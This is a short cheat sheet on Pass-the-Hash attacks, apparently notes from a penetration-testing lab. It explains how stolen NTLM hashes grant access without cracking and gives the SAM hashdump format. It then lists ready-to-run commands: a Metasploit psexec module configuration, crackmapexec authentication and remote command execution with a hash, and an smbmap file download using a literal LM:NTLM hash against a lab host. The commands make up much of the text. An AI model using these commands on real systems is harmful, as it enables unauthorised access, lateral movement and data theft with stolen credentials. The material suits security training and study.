Pass-the-Hash Attack
Pass-the-Hash (PtH) attacks allow attackers to authenticate with a target system by using stolen NTLM hashes without the need to crack them. Instead of decrypting the hash, the attacker directly uses it to impersonate the legitimate user and gain access to the system.
Once an attacker has retrieved NTLM hashes, they can proceed without cracking them by utilizing tools designed for PtH attacks, such as:
Metasploit PsExec Module: This module allows attackers to execute commands on a remote system using NTLM hashes to authenticate.
Crackmapexec: A versatile tool that can perform lateral movement by leveraging NTLM hashes for authentication and access across the network.
PtH attacks exploit legitimate credentials, allowing access to systems without relying on service vulnerabilities. Even if the target services are patched or firewall rules restrict access, this technique bypasses those defenses by leveraging harvested credentials to authenticate and gain access.
The format for a hashdump on Windows is typically organized as follows:
USER : SID : LM-Hash : NTLM/NT-HashThis format is commonly seen when extracting password hashes from the Security Account Manager (SAM) database in Windows.
w/ MSF
# After you get the hash
use exploit/windows/smb/psexec
show options
set LPORT [PORT]
set RHOSTS [Target-IP]
set SMBUser admin
set SMBPass [LM-Hash:NTLM/NT-Hash]
set target Native\ upload
exploitw/ Crackmapexec
crackmapexec smb [IP] -u USERNAME -H "NTLM-HASH"
crackmapexec smb [IP] -u USERNAME -H "NTLM-HASH" -x 'ifconfig'Important Stuffs
# After you get the hash
use exploit/windows/smb/psexec
show options
set LPORT [PORT]
set RHOSTS [Target-IP]
set SMBUser admin
set PASS_FILE [LM-Hash:NTLM/NT-Hash List]
set target Native\ upload
exploit
# download resource with NTLM Hash
smbmap -u nancy -p aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad -H target.ine.local -r ITResources --download ./ITResources/hint.txtLast updated